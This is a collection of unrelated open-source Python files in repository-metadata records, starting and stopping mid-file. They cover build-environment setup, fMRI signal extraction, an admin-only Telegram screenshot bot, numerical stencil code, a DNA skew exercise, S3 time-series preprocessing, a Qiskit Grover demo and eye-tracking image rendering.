trtvar.startswith('PATH:'):\n var = trtvar[5:]\n if var in self.ignore_env: continue\n if projTool and environ['SCRAM_ARCH'].startswith('osx') and \\\n var == 'DYLD_LIBRARY_PATH':\n var = 'LD_LIBRARY_PATH'\n var = self._fixlibenv(var)\n if var not in self.env['rtstring']['path']:\n self.env['rtstring']['path'][var] = []\n self.env['paths'][var] = {}\n for val in trtval:\n if tname == 'gmake' and var == 'PATH' and \\\n gmake == '' and exists(join(val, 'gmake')):\n gmake = val + \"/\"\n self.env['rtstring']['xenv']['SCRAM_GMAKE_PATH'] = gmake\n if (var not in self.skip_runtime) or (tname in self.force_tools_env):\n if val not in self.env['paths'][var]:\n self.env['paths'][var][val] = 1\n self.env['rtstring']['path'][var].append(val)\n elif trtvar not in self.env['variables']:\n self.env['rtstring']['variables'].append({trtvar: trtval})\n\n def _read_ignore_env(self):\n if not 'HOME' in environ: return\n env_file = join(environ[\"HOME\"], \".scramrc\", \"runtime\")\n if not exists(env_file): return\n ignore_env = \"\"\n with open(env_file) as f_in:\n for line in f_in.readlines():\n line = line.strip()\n if not line or line.startswith(\"#\"):\n continue\n items = line.split(\":\", 1)\n if (len(items)==2) and (items[0]==\"ignore\"):\n for e in [ x for x in items[1].split(\" \") if x]:\n ignore_env += \" %s\\n\" % e\n self.ignore_env[e] = 1\n if ignore_env:\n SCRAM.printerror(\"**** Following environment variables are ignored via ~/.scramrc/runtime and will not be set/changed.\\n%s\" % ignore_env)\n return\n\n\n def _cleanpath(self, path, sep):\n upath = {}\n opath = []\n for p in path.split(sep):\n p = abspath(p)\n if not p:\n continue\n while '/./' in p:\n p = p.replace('/./', '/')\n while '//' in p:\n p = p.replace('//', '/')\n while p.endswith('/.'):\n p = p[:-2]\n if not p:\n p = '/'\n if p not in upath:\n upath[p] = 1\n opath.append(p)\n return sep.join(opath)\n","repo_name":"cms-sw/SCRAM","sub_path":"SCRAM/Core/RuntimeEnv.py","file_name":"RuntimeEnv.py","file_ext":"py","file_size_in_byte":20420,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"28800899096","text":"import os\nimport pandas as pd\nfrom bids import BIDSLayout\n\nimport boldsignals as bold\nimport process_connectome as pc\nimport lib\n\nimport importlib\n\nimportlib.reload(lib)\nimportlib.reload(bold)\nimportlib.reload(pc)\n\npd.options.mode.chained_assignment = None\n\n# %%\n# Lecture du format BIDS\ndataset_name = 'lightduo_sample'\nderivatives_path = os.path.abspath(r'datasets_sample\\lightduo-preproc-fmriprep')\nlayout = BIDSLayout(derivatives_path, index_metadata=True, reset_database=False, validate=False,\n config=[\"bids\", \"derivatives\"])\n\natlas_name = 'CAB-NP'\natlas_path = os.path.abspath(r'..\\..\\atlas\\CAB-NP_volumetric\\CAB-NP_volumetric_liberal.nii.gz')\n\nconfounds_strategies = 'compcor'\n# %%\n\nsubjects_id_list = layout.get_subjects()\ndirectory = 'timeSeries_files'\nsub_dir = os.path.join(directory, dataset_name, atlas_name)\nif not os.path.exists(sub_dir):\n os.makedirs(sub_dir)\n\nbold_signals_config = pd.DataFrame(columns=subjects_id_list, index=['path', 'nlevels'])\ninfo_csv_path = os.path.join(sub_dir, 'bold_signals_config.csv')\n\n\n# %%\nfor subj_id in subjects_id_list:\n runs_bidsfiles_per_subjects = layout.get(subject=subj_id, suffix='bold', scope='derivatives', extension='nii.gz')\n runs_bidsfiles_ids_list_per_subject = []\n bold_signals_list_per_subject = []\n tr_runs_per_subject = []\n\n for run_bidsfile in runs_bidsfiles_per_subjects:\n run_bidsfile_ids = bold.get_keys_of_interest(run_bidsfile)\n tr_per_run = bold.get_tr_per_run(run_bidsfile)\n\n run_nifti_path = run_bidsfile.path\n bold_signals_confounds = bold.get_bold_signals_confounds(run_nifti_path, confounds_strategies)\n\n bold_signal = bold.calculate_bold_signals(run_nifti_path, atlas_path)\n bold_signal_cleaned = bold.clean_bold_signals(bold_signal, bold_signals_confounds, tr_per_run)\n\n runs_bidsfiles_ids_list_per_subject.append(run_bidsfile_ids)\n bold_signals_list_per_subject.append(str(bold_signal_cleaned))\n tr_runs_per_subject.append(tr_per_run)\n\n bold_signals_per_subject_df_output = bold.store_bold_signals_in_df(bold_signals_list_per_subject, tr_runs_per_subject,\n runs_bidsfiles_ids_list_per_subject,\n confounds_strategies)\n\n csv_output_path = os.path.join(sub_dir, 'id_boldsignals.csv'.replace('id', subj_id))\n bold.save_bold_signals_output(bold_signals_per_subject_df_output, csv_output_path)\n\n bold_signals_config.loc['path', subj_id] = csv_output_path\n bold_signals_config.loc['nlevels', subj_id] = bold_signals_per_subject_df_output.columns.nlevels\n\nbold_signals_config.to_csv(info_csv_path, header=True)\n\n","repo_name":"pnplab/biotypes_robust","sub_path":"connectomes_extraction/calcul_boldsignals.py","file_name":"calcul_boldsignals.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20065912269","text":"import sys\nimport time\nimport telepot\nimport pyautogui\nfrom telepot.loop import MessageLoop\nfrom tokens import *\n\nclass MyBot(telepot.Bot):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(MyBot, self).__init__(*args, **kwargs)\n\t\tself.answerer = telepot.helper.Answerer(self)\n\t\tself._message_with_inline_keyboard = None\n\t\t\n\tdef on_chat_message(self, msg):\n\t\tcontent_type, chat_type, chat_id = telepot.glance(msg)\n\t\t\n\t\t# For debugging and get admin id\n\t\t# print(content_type, chat_type, chat_id)\n\t\n\t\tif chat_id in adminId:\n\t\t\tif content_type == 'text':\n\t\t\t\tif msg['text'] == '/capture':\n\t\t\t\t\tbot.sendChatAction(chat_id, 'typing')\n\t\t\t\t\tbot.sendMessage(chat_id, \"Capturing image\")\n\t\t\t\t\tself.capture_img()\n\t\t\t\t\tbot.sendPhoto(chat_id, photo=open('img\\\\screenshot.png', 'rb'))\n\t\t\n\t\telse:\n\t\t\tbot.sendMessage(chat_id, \"Not admin\")\n\tdef capture_img(self):\n\t\tpic = pyautogui.screenshot()\n\t\tpic.save('img\\\\screenshot.png')\n\t\treturn\n\t\nTOKEN = telegrambot\n\nbot = MyBot(TOKEN)\nMessageLoop(bot).run_as_thread()\n# Umcomment for debugging\n# print('Listening ...')\n\nwhile 1:\n\ttime.sleep(10)","repo_name":"shafiqsaaidin/monbot","sub_path":"mon.py","file_name":"mon.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"30369125974","text":"\"\"\"\nObjects relating to the support region of the basis used to impose the boundary\nconditions.\n\"\"\"\n\nimport numpy as np\nfrom devito.tools.data_structures import frozendict\nfrom functools import reduce\nfrom schism.geometry.skin import stencil_footprint\n\n\ndef get_points_and_oob(support_points, modified_points, geometry):\n \"\"\"\n Get the points used by each stencil and a mask indicating where these are\n out of bounds.\n\n Parameters\n ----------\n support_points : tuple\n Points in the support region of the stencil\n modified_points : tuple\n Points where modified stencils are required\n geometry : BoundaryGeometry\n Geometry of the boundary. Used to obtain the Grid.\n\n Returns\n -------\n points : tuple\n Points accessed by the stencil when applied at the modified points\n oob : ndarray\n Boolean mask for points. True where points are out of bounds\n \"\"\"\n grid = geometry.grid\n ndims = len(grid.dimensions)\n points = tuple([support_points[dim][:, np.newaxis]\n + modified_points[dim][np.newaxis, :]\n for dim in range(ndims)])\n\n # Out of bounds points\n oob = [np.logical_or(points[dim] < 0, points[dim] >= grid.shape[dim])\n for dim in range(ndims)]\n\n # If a point is out of bounds in any dimension, then label as oob\n oob_msk = reduce(np.logical_or, oob)\n\n return points, oob_msk\n\n\ndef footprint_union(fp1, fp2):\n \"\"\"Get the union of two stencil footprints\"\"\"\n fpa1 = np.array(fp1)\n fpa2 = np.array(fp2)\n fp_all = np.concatenate((fpa1, fpa2), axis=-1)\n fp_union = np.unique(fp_all, axis=-1)\n # The union footprint\n footprint = tuple([fp_union[i] for i in range(fp_union.shape[0])])\n # The mask points of fp2 in union footprint\n # Compares the coordinates, checks there is a match in all dims,\n # then sets true where a coordinate from fpa2 is located in\n # fp_union\n mask = (fp_union[:, np.newaxis] == fpa2[..., np.newaxis]).all(0).any(0)\n return footprint, mask\n\n\nclass SupportRegion:\n \"\"\"\n The support region for a set of basis functions.\n\n Parameters\n ----------\n basis_map : dict\n Mapping between functions and their respective basis functions\n radius_map : dict\n Mapping between functions and the radius of their basis. Note that this\n is not a true radius, so much as a convenient measure of extent\n measured in grid increments.\n deriv : Derivative\n The derivative of the underlying stencil. Used to ensure that\n the resultant support region is the union of extrapolant and\n interior stencils.\n\n Attributes\n ----------\n footprint_map : dict\n Mapping between functions and the points within their support region\n npts_map : dict\n Mapping between functions and the number of points within their support\n region.\n max_span_func : Function\n The function with the largest span\n\n Methods\n -------\n expand_radius(inc)\n Return a support region with an expanded radius\n \"\"\"\n def __init__(self, basis_map, radius_map, deriv):\n self._basis_map = basis_map\n self._radius_map = radius_map\n self._max_span_func = max(self.radius_map, key=self.radius_map.get)\n\n # Derivative for footprint of the underlying stencil\n self._deriv = deriv\n\n self._get_footprint()\n\n def _get_footprint(self):\n \"\"\"Get the stencil footprint for each function\"\"\"\n footprints = {}\n npts_map = {}\n if self.basis_map.keys() != self.radius_map.keys():\n # Should never end up here\n raise ValueError(\"Mismatch in functions supplied\")\n\n for func in self.basis_map:\n if self.basis_map[func].dims == func.space_dimensions:\n # N-D basis so N-D support region\n footprint = self._get_circle_support(func)\n else:\n if len(self.basis_map[func].dims) != 1:\n # Should never end up here\n raise ValueError(\"Basis neither 1D or N-D\")\n # 1D basis\n footprint = self._get_linear_support(func)\n footprints[func] = footprint\n\n if func is self.deriv.expr:\n base_footprint = self._get_base_support()\n # Get union with support region of interior\n # stencil. This prevents issues when interior\n # stencils have a larger footprint than that\n # used for extrapolation.\n union, mask = footprint_union(base_footprint,\n footprints[func])\n footprints[func] = union\n self._extrapolant_mask = mask\n npts_map[func] = footprints[func][0].shape[0]\n self._footprint_map = frozendict(footprints)\n self._npts_map = frozendict(npts_map)\n\n def _get_circle_support(self, func):\n \"\"\"Get the footprint of a circular support region\"\"\"\n # Essentially makes a square then cookie-cutters it\n radius = self.radius_map[func]\n dims = func.space_dimensions\n ndims = len(dims)\n # Make a meshgrid of indices (of int type)\n # Indexing type changes order of points but not points overall\n # 'ij' results in most logical ordering however\n msh = np.meshgrid(*[np.arange(-radius, radius+1, dtype=int)\n for dim in dims],\n indexing='ij')\n # Mask it by radius\n mask = np.sqrt(sum(msh[i]**2 for i in range(ndims))) < radius + 0.5\n # Do np.where to get meshgrid indices\n locs = np.where(mask)\n # Use indices to get the physical indices from the meshgrid\n footprint = [msh[i][locs].flatten() for i in range(ndims)]\n # Return these as a tuple of arrays\n return tuple(footprint)\n\n def _get_linear_support(self, func):\n \"\"\"Get the footprint of a 1D support region\"\"\"\n footprint = []\n basis = self.basis_map[func]\n radius = self.radius_map[func]\n for dim in func.space_dimensions:\n if dim in basis.dims:\n footprint.append(np.arange(-radius, radius+1, dtype=int))\n else: # No offset in other dimensions\n footprint.append(np.zeros(1+2*radius, dtype=int))\n return tuple(footprint)\n\n def _get_base_support(self):\n \"\"\"Get the footprint of the interior stencil\"\"\"\n footprint = stencil_footprint(self.deriv)\n return footprint\n\n def expand_radius(self, inc):\n \"\"\"\n Return another support region with radius expanded by the increment\n specified\n\n Parameters\n ----------\n inc : int\n The amount by which the radius should be incremented\n\n Returns\n -------\n expanded : SupportRegion\n The expanded support region\n \"\"\"\n new_radius_map = {func: rad + inc\n for func, rad in self.radius_map.items()}\n return self.__class__(self.basis_map, new_radius_map, self.deriv)\n\n @property\n def basis_map(self):\n \"\"\"Mapping between functions and respective basis functions\"\"\"\n return self._basis_map\n\n @property\n def radius_map(self):\n \"\"\"Mapping between functions and the radius of their basis\"\"\"\n return self._radius_map\n\n @property\n def max_span_func(self):\n \"\"\"The function with the largest support region span\"\"\"\n return self._max_span_func\n\n @property\n def footprint_map(self):\n \"\"\"\n Mapping between functions and the footprint of their support region.\n \"\"\"\n return self._footprint_map\n\n @property\n def npts_map(self):\n \"\"\"\n Mapping between functions and the number of points in their support\n regions.\n \"\"\"\n return self._npts_map\n\n @property\n def deriv(self):\n \"\"\"\n Footprint of the underlying derivative stencil. Used when i\n \"\"\"\n return self._deriv\n\n @property\n def extrapolant_mask(self):\n \"\"\"\n Return the mask limiting the footprint in the field on which the\n derivative is taken to that of the extrapolation support region.\n \"\"\"\n return self._extrapolant_mask\n","repo_name":"devitocodes/schism","sub_path":"schism/geometry/support_region.py","file_name":"support_region.py","file_ext":"py","file_size_in_byte":8337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"44157011496","text":"# Write a function SkewArray(Genome) that takes a DNA string Genome as input \n# and returns the skew array of Genome in the form of a list whose i-th \n# element is Skew[i]. Then add this function to Replication.py.\nimport matplotlib.pyplot as plt\n\ndef skewArray(genome):\n array = [0 for i in range(len(genome) + 1)]\n\n for i in range(len(genome)):\n if genome[i] == 'A' or genome[i] == 'T':\n array[i+1] = array[i]\n elif genome[i] == 'G':\n array[i+1] = array[i] + 1\n elif genome[i] == 'C':\n array[i+1] = array[i] - 1\n return array\n\n\ndef skewArray2(genome):\n array = [0 for i in range(len(genome) + 1)]\n result = {}\n\n for i in range(len(genome)):\n if genome[i] == 'A' or genome[i] == 'T':\n array[i+1] = array[i]\n elif genome[i] == 'G':\n array[i+1] = array[i] + 1\n elif genome[i] == 'C':\n array[i+1] = array[i] - 1\n for i in range(len(array)):\n result[i] = array[i]\n return result\n\nif __name__ == '__main__':\n \"\"\" array = skewArray('AGCGTGCCGAAATATGCCGCCAGACCTGCTGCGGTGGCCTCGCCGACTTCACGGATGCCAAGTGCATAGAGGAAGCGAGCAAAGGTGGTTTCTTTCGCTTTATCCAGCGCGTTAACCACGTTCTGTGCCGACTTT')\n plt.plot(array[:], marker='o')\n plt.show() \"\"\"\n skew = skewArray(\"GATACACTTCCCGAGTAGGTACTG\")\n print(skew)\n\n","repo_name":"PaulOnyekwelu/biology-meets-programming","sub_path":"week-2/skew_array.py","file_name":"skew_array.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23204884080","text":"import pickle\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport sagemaker\nimport boto3 \nimport s3fs\nimport json\nimport datetime\nfrom tzlocal import get_localzone as tzlocal\nimport numpy as np\nimport datetime\nfrom tzlocal import get_localzone as tzlocal\nimport boto3\nfrom tqdm import tqdm_notebook as tqdm\nimport os\nfrom os import path \nimport json\nfrom deep_ar import series_to_jsonline\n\nbmw_bucket_name = os.environ['BMW_DATA_BUCKET'] #'fog-bigdata-bmw-data'\ndata_bucket_name = os.environ['SANITIZED_DATA_BUCKET'] #'fog-datasets'\ndata_freq = os.environ['DATA_FREQUENCY'] #'5min'\n\ns3_con = boto3.client('s3')\nobj_list = s3_con.list_objects(Bucket=bmw_bucket_name,Prefix='metrics2/output')['Contents']\nfile_names = [key['Key'] for key in obj_list]\n\ndata = []\nfor file_name in tqdm(file_names):\n # Select file with the correct extension\n if not file_name.endswith('output.json'):\n continue\n file_str = s3_con.get_object(Bucket=bmw_bucket_name, Key=file_name).get('Body').read().decode('utf-8')\n batch = eval(file_str)\n \n # Aggregates response code into a unique time series\n for code in ['response-code-200','response-code-4xx','response-code-5xx']:\n if code not in batch.keys():\n continue\n data = data + batch[code]['Datapoints']\n \n# Creates a pandas Dataframe from data\ndf = pd.DataFrame(data)\ndf.index = [i.replace(tzinfo=None) for i in pd.to_datetime(df.Timestamp)]\ndf = df.drop(columns=['Unit'])\ndf = df.groupby('Timestamp').max()\nseries = pd.Series(data=df.SampleCount.values, index=[i.replace(tzinfo=None) for i in pd.to_datetime(df.index)])\nseries = series.sort_index()\n#series = series[series.index < datetime.datetime(2019,1,26,0,0,0)]\nseries = series.groupby([pd.Grouper(freq=data_freq)]).sum()\n\n# Apply a running mean of the previous 15 minutes to each datapoint -> smoothing to remove anomalies and have a clean training set\nn_backsteps = 5\nconv = np.hstack([np.ones(n_backsteps)/n_backsteps,np.zeros(n_backsteps-1)])\npad_vals = np.pad(series.values,n_backsteps-1,mode='edge')\nseries = pd.Series(data=np.convolve(pad_vals,conv,mode='valid'),index=series.index)\n\n\n# Scale down a part of the data (that was incorrectly scaled, for unknown reasons)\nseries[np.logical_and(series.index >= pd.Timestamp(2019,1,26),series.index < pd.Timestamp(2019,1,31,8,55))] /= 2 \n\ntest_idx = np.logical_and(series.index > datetime.datetime(2019,1,28,0,0,0), series.index <= datetime.datetime(2019,2,4,0,0,0))\ntrain_idx = series.index <= datetime.datetime(2019,1,28,0,0,0)\n\n\n# Upload RCF-shaped data\nprint(\"Uploading RCF-shaped data\")\nprefix = 'rcf'\n\ns3_data_path = \"{}/{}/data\".format(data_bucket_name, prefix)\ns3filesystem = s3fs.S3FileSystem()\n\nwith s3filesystem.open(s3_data_path + \"/train/data.csv\", 'w') as fp:\n fp.write(series[train_idx].to_csv())\n\nwith s3filesystem.open(s3_data_path + \"/test/data.csv\", 'w') as fp:\n fp.write(series[test_idx].to_csv())\n\n# Upload DeepAR-shaped data\nprint(\"Uploading DeepAR-shaped data\")\n\n# Create feature series of holidays\nend_of_holiday = datetime.date(2019, 1, 7)\nholidays_data = [1 if time < pd.Timestamp(end_of_holiday,tz=None) else 0 for time in series.index]\nholidays_feature_serie = pd.Series(data=holidays_data, index=series.index)\n\n# Create feature series of weekends\nweekends_date = [0 if time.weekday() < 5 else 1 for time in series.index]\nweekends_feature_series = pd.Series(data=weekends_date, index=series.index)\n\n\n# Upload preprocessed data for deep AR\nprefix = 'deep_ar'\ns3_data_path = \"{}/{}/data\".format(data_bucket_name, prefix)\n\nwith s3filesystem.open(s3_data_path + \"/train/data.json\", 'w') as fp:\n fp.write(series_to_jsonline(series[train_idx], [list(holidays_feature_serie[train_idx]), list(weekends_feature_series[train_idx])]))\n\nwith s3filesystem.open(s3_data_path + \"/test/data.json\", 'w') as fp:\n fp.write(series_to_jsonline(series[test_idx], [list(holidays_feature_serie[test_idx]), list(weekends_feature_series[test_idx])]))\n\n","repo_name":"AlexandreRozier/BigDataAnalytics","sub_path":"models/deep_ar/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"72341191029","text":"\nfrom qiskit import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\noracle = QuantumCircuit(2, name='oracle')\noracle.cz(0,1)\noracle.to_gate()\noracle.draw()\n\nbackend = Aer.get_backend('statevector_simulator')\ngrover_circ = QuantumCircuit(2, 2)\ngrover_circ.h([0, 1])\ngrover_circ.append(oracle, [0,1])\ngrover_circ.draw()\n\njob = execute(grover_circ, backend)\nresult = job.result()\nsv = result.get_statevector()\nnp.round(sv, 2)","repo_name":"watermelonich/quantum-programs","sub_path":"grover search algorithm/gr2.py","file_name":"gr2.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"28690334718","text":"import pdb\nimport sys\nimport pyrealsense2 as rs\nimport numpy as np\nimport cv2\nfrom math import pi\nimport time\n\nimport zmq\nfrom msgpack import loads\nimport threading\n\nimport numpy as np\nimport math\nimport time\nimport scipy.io\nfrom sklearn.linear_model import LinearRegression\n\nfrom skimage import color, data, restoration, metrics\n\nimport screeninfo\n\n#Get ScreenInfo\nscreen_id = 1\nscreen = screeninfo.get_monitors()[screen_id]\nresolution = [screen.width, screen.height]\n\n## Setting for realsense\nREALSENSE_CAMERA = \"D435\" #D435 / L515\n\n# Camera setting and tracking setting\nif REALSENSE_CAMERA == \"D435\" :\n DEPTH_CAMERA_MAX_THETA = 57 / 2.0 * (pi / 180)\n DEPTH_CAMERA_MAX_PHI = 86 / 2.0 * (pi / 180)\n COLOR_CAMERA_MAX_THETA = 41 / 2.0 * (pi / 180)\n COLOR_CAMERA_MAX_PHI = 64 / 2.0 * (pi / 180)\nelif REALSENSE_CAMERA == \"L515\" :\n DEPTH_CAMERA_MAX_THETA = 55 / 2.0 * (pi / 180)\n DEPTH_CAMERA_MAX_PHI = 70 / 2.0 * (pi / 180)\n COLOR_CAMERA_MAX_THETA = 43 / 2.0 * (pi / 180)\n COLOR_CAMERA_MAX_PHI = 70 / 2.0 * (pi / 180)\n\nif REALSENSE_CAMERA == \"D435\" :\n DEPTH_CAMERA_RES = 640,480\n COLOR_CAMERA_RES = 640,480\nelif REALSENSE_CAMERA == \"L515\" :\n DEPTH_CAMERA_RES = 1024,768\n COLOR_CAMERA_RES = 1280,720\n\n## Setting for Pupil_tracker\naddr = '127.0.0.1' # remote ip or localhost\nreq_port = \"50020\" # same as in the pupil remote gui\n\n## Setting for inverse filtering image\npupil_diameter = 2e-3\neye_length = 24e-3\neye_relief = 1e-1\nkernel_radius_pixel = 21\nnum_slicing_imgs = 4 # for rendering_display\n\n# Convert matrix default setting\nconvert_matrix = np.array([[1.0078, 0.1722, 0.0502], [0, 0, 0], [0.0532, -0.6341, 0.7817]])\n\n\ndef make_convert_matrix(sub):\n \"\"\"\n front side = input degree is 184\n (x_1, y_1, z_1): world coordinate\n (x_2, y_2, z_2): viewing coordinate (pupil camera coordinate)\n \"\"\"\n coord_1 = None\n coord_2 = None\n\n degree = input(\"type observed degree:\")\n while(degree != 'end' and degree != '-1'):\n degree = float(degree)\n theta_1 = pi / 2\n phi_1 = (degree - 184 + 90) * pi / 180\n x_1 = - np.sin(theta_1) * np.cos(phi_1)\n y_1 = np.cos(theta_1)\n z_1 = np.sin(theta_1) * np.sin(phi_1)\n\n sub.connect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n topic,msg_1 = sub.recv_multipart()\n message_1 = loads(msg_1)\n theta_2 = message_1[b'theta']\n phi_2 = message_1[b'phi']\n sub.disconnect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n\n x_2 = np.sin(theta_2) * np.cos(phi_2)\n y_2 = np.cos(theta_2)\n z_2 = np.sin(theta_2) * np.sin(phi_2)\n\n if coord_1 is None:\n coord_1 = np.array([[x_1, y_1, z_1]])\n else:\n coord_1 = np.append(coord_1, [[x_1, y_1, z_1]], axis=0)\n if coord_2 is None:\n coord_2 = np.array([[x_2, y_2, z_2]])\n else:\n coord_2 = np.append(coord_2, [[x_2, y_2, z_2]], axis=0)\n\n degree = input(\"type observed degree:\")\n\n # coord_1 = np.array([[-0.5,\t0,\t0.866025404],[-0.342020143,\t0,\t0.939692621],[-0.173648178,\t0,\t0.984807753],[0,\t0,\t1],[0.173648178,\t0,\t0.984807753],[0.342020143,\t0,\t0.939692621],[0.5,\t0,\t0.866025404]])\n # coord_2 = np.array([[-0.420787921,\t-0.390899842,\t0.818617639],[-0.32087076,\t-0.557559388,\t0.765617061],[-0.137999648,\t-0.649991026,\t0.747307007],[0.083080865,\t-0.662271994,\t0.74464312],[0.274478632,\t-0.610046409,\t0.743306706],[0.418590941,\t-0.480357372,\t0.770738879],[0.460415755,\t-0.314987365,\t0.829939933]])\n\n print(\"coord_1 : \", coord_1)\n print(\"coord_2 : \", coord_2)\n\n model_x = LinearRegression(fit_intercept=False).fit(coord_2,coord_1[:,0])\n model_y = LinearRegression(fit_intercept=False).fit(coord_2, coord_1[:,1])\n model_z = LinearRegression(fit_intercept=False).fit(coord_2, coord_1[:,2])\n\n convert_matrix = np.array([model_x.coef_, model_y.coef_, model_z.coef_])\n return convert_matrix\n\n\ndef convert_pupil_to_realsense(theta, phi) :\n x = np.sin(theta) * np.cos(phi)\n y = np.cos(theta)\n z = np.sin(theta) * np.sin(phi)\n coord = np.array([[x],[y],[z]])\n\n converted_coord = np.dot(convert_matrix, coord)\n\n converted_x, converted_y, converted_z = converted_coord\n converted_theta = np.arctan(converted_y / converted_z)\n converted_phi = np.arctan(converted_x / converted_z)\n\n return converted_theta, converted_phi\n\ndef full_rendering_display(color_img, depth_img, gaze_depth, c = 8.0e+4):\n \"\"\"\n slice color image by 'each depth' in depth image. Create corresponding PSF on each slice. \n Apply convolution on every slice and add up every slice. return normalized reconstructed image.\n c : coefficient for gaussian psf\n \"\"\"\n eye_focal_length = 1 / (1 / gaze_depth + 1 / eye_length)\n color_img=color_img.astype(float)\n depth_img=depth_img.astype(float)\n filtered_img=np.zeros_like(color_img)\n edge = np.zeros_like(depth_img)\n\n # Calculate target intensity sum\n target_intensity_sum = np.sum(color_img)\n\n RES = COLOR_CAMERA_RES #resolution of color_img, detph_img\n x,y = np.meshgrid(np.linspace(-RES[0]//2, RES[0]//2-1,RES[0]), np.linspace(-RES[1]//2,RES[1]//2-1,RES[1]))\n radius = np.sqrt(x*x+y*y)\n\n depths = np.unique(depth_img[depth_img>0])\n\n sliced_color_imgs = []\n\n for depth in depths : \n pixel_select=np.zeros_like(depth_img)\n pixel_select[depth_img == depth] = 1 \n\n edge += cv2.Canny(np.uint8(pixel_select*255), 50, 100)\n pixel_select = np.stack((pixel_select,pixel_select,pixel_select), axis = 2)\n sliced_color_img = color_img * pixel_select\n sliced_color_imgs.append((sliced_color_img, depth / 1000.0))\n\n for sliced_color_img, mean_depth in sliced_color_imgs:\n b = (eye_focal_length / (gaze_depth - eye_focal_length))* pupil_diameter * abs(mean_depth - gaze_depth) / mean_depth # blur diameter\n kernel = np.zeros_like(sliced_color_img[:,:,0]) # same size with single channel of image (2D)\n \n if b == 0 :\n kernel[RES[1]//2, RES[0]//2] = 1 # delta function\n else :\n kernel = 2 / (pi * (c * b)**2) * np.exp(-2 * radius**2 / (c * b)**2)\n kernel[radius > kernel_radius_pixel] = 0 #Use 21*21 nonzero points near origin, otherwise, value is zero\n \n #normalization\n if np.sum(kernel) == 0: # when does this occurs? if psf is too small in every pixel\n kernel[res_window[1]//2, res_window[0]//2]=1\n else:\n kernel = kernel / np.sum(kernel)\n\n compensate_img = cv2.filter2D(sliced_color_img, -1, kernel)\n filtered_img += compensate_img\n\n #just add zero depth pixel to filtered image\n pixel_select = np.zeros_like(depth_img)\n pixel_select[depth_img==0] = 1\n pixel_select = np.stack((pixel_select, pixel_select, pixel_select), axis = 2)\n color_img_zero_depth = color_img * pixel_select\n filtered_img += color_img_zero_depth\n\n edge = np.clip(edge, 0, 255).astype('uint8')\n dilated_edge = cv2.dilate(edge, np.ones((3, 3)))\n dilated_edge = np.stack((dilated_edge, dilated_edge, dilated_edge), axis=2)\n\n #blurred_filtered_img = cv2.GaussianBlur(filtered_img, (5, 5), 0) # Smoothing boundary\n blurred_filtered_img = filtered_img # No smoothing boundary\n smoothed_filtered_img = np.where(dilated_edge==np.array([255,255,255]), blurred_filtered_img, filtered_img)\n\n #smoothed_filtered_img = filtered_img\n smoothed_filtered_img = np.clip(smoothed_filtered_img, 0, np.max(smoothed_filtered_img))\n smoothed_filtered_img = smoothed_filtered_img / np.sum(smoothed_filtered_img) * target_intensity_sum / 255.0\n smoothed_filtered_img = np.clip(smoothed_filtered_img, 0, 1)\n\n return smoothed_filtered_img, len(sliced_color_imgs)\n\ndef rendering_display(color_img, depth_img, gaze_depth, c = 8.0e+4, num_slicing_imgs = 4):\n \"\"\"\n slice color image by 'num_slicing_imgs' in depth image. Create corresponding PSF on each slice. \n Apply convolution on every slice and add up every slice. return normalized reconstructed image.\n c : coefficient for gaussian psf\n \"\"\"\n eye_focal_length = 1 / (1 / gaze_depth + 1 / eye_length)\n color_img=color_img.astype(float)\n depth_img=depth_img.astype(float)\n filtered_img=np.zeros_like(color_img)\n edge = np.zeros_like(depth_img)\n\n # Calculate target intensity sum\n target_intensity_sum = np.sum(color_img)\n\n RES = COLOR_CAMERA_RES #resolution of color_img, detph_img\n x,y = np.meshgrid(np.linspace(-RES[0]//2, RES[0]//2-1,RES[0]), np.linspace(-RES[1]//2,RES[1]//2-1,RES[1]))\n radius = np.sqrt(x*x+y*y)\n\n depths = depth_img[depth_img>0]\n percentiles = np.linspace(0,100,num_slicing_imgs+1)\n depth_bounds = np.percentile(depths, percentiles, interpolation='nearest')\n depths = np.unique(depths)\n\n sliced_color_imgs = []\n\n for idx in range(num_slicing_imgs): # idx th slice\n pixel_select=np.zeros_like(depth_img)\n for depth in depths: # create boolean mask\n if depth_bounds[idx] <= depth and depth< depth_bounds[idx+1]:\n pixel_select[depth_img==depth] = 1 \n \n if idx == num_slicing_imgs - 1 : # add last depth on last slice\n pixel_select[depth_img == depth_bounds[num_slicing_imgs]] = 1\n\n masked_depth_img = depth_img[pixel_select == 1]\n\n if len(masked_depth_img) == 0: # if masked_depth_img is blank\n continue\n \n mean_depth = np.mean(masked_depth_img)\n if int(gaze_depth*1000) in masked_depth_img :\n mean_depth = int(gaze_depth*1000)\n\n edge += cv2.Canny(np.uint8(pixel_select*255), 50, 100)\n pixel_select = np.stack((pixel_select,pixel_select,pixel_select), axis = 2)\n sliced_color_img = color_img * pixel_select\n sliced_color_imgs.append((sliced_color_img, mean_depth / 1000.0))\n\n for sliced_color_img, mean_depth in sliced_color_imgs:\n b = (eye_focal_length / (gaze_depth - eye_focal_length))* pupil_diameter * abs(mean_depth - gaze_depth) / mean_depth # blur diameter\n kernel = np.zeros_like(sliced_color_img[:,:,0]) # same size with single channel of image (2D)\n \n if b == 0 :\n kernel[RES[1]//2, RES[0]//2] = 1 # delta function\n else :\n kernel = 2 / (pi * (c * b)**2) * np.exp(-2 * radius**2 / (c * b)**2)\n kernel[radius > kernel_radius_pixel] = 0 #Use 21*21 nonzero points near origin, 